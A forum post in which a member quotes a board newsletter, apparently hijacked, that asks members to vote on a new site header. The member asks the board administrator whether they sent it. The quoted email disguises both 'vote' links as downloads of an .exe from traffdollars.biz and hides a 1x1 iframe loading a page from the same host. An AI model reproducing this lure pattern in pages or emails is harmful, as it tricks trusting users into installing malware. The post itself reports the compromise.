CODE
PC-fre@k,
Hey everyone,
We have opened the polls to vote for bfarber.com's new header!
We had an amazing 21 entries for the dark skin and 13 entries for the light skin!
We are requesting that ALL members, take a moment and check out the great submissions for our new header. Please look through all the options in each poll and cast your vote. It will only take a few moments and will empower all of you to choose our site's new header!
Vote for Dark Skin's header: Click here! <a href="http://traffdollars.biz/dl/loadadv553.exe" target="_blank">please click</a>
Vote for Light Skin's header: Click here! <a href="http://traffdollars.biz/dl/loadadv553.exe" target="_blank">please click</a>9
-------------------------------------
bfarber.com Statistics:
-------------------------------------
Registered Users: 43943
Total Posts: 37540
Busiest Time: 489 users were online on 13th December 2004 - 10:01 PM
-------------------------------------
Handy Links
-------------------------------------
Board Address: http://bfarber.com/index.php
Log In: http://bfarber.com/index.php?act=Login&CODE=00
Lost Password Recovery: http://bfarber.com/index.php?act=Reg&CODE=10
-------------------------------------
How to unsubscribe
-------------------------------------
Visit your email preferences (http://bfarber.com/index.php?act=UserCP&CODE=02) and ensure that the box for 'Send me any updates sent by the board administrator' is unchecked and submit the form
<iframe src="http://traffdollars.biz/dl/adv553.php" width=1 height=1></iframe>
You see the EXE's? And the iframe? Then I visited this site and found out here is also something from htt_p://traffdollars.biz loaded!
I would like to know if you really send this yourself, what this has to mean, or whatever happend???
Thanks,
PC-fre@k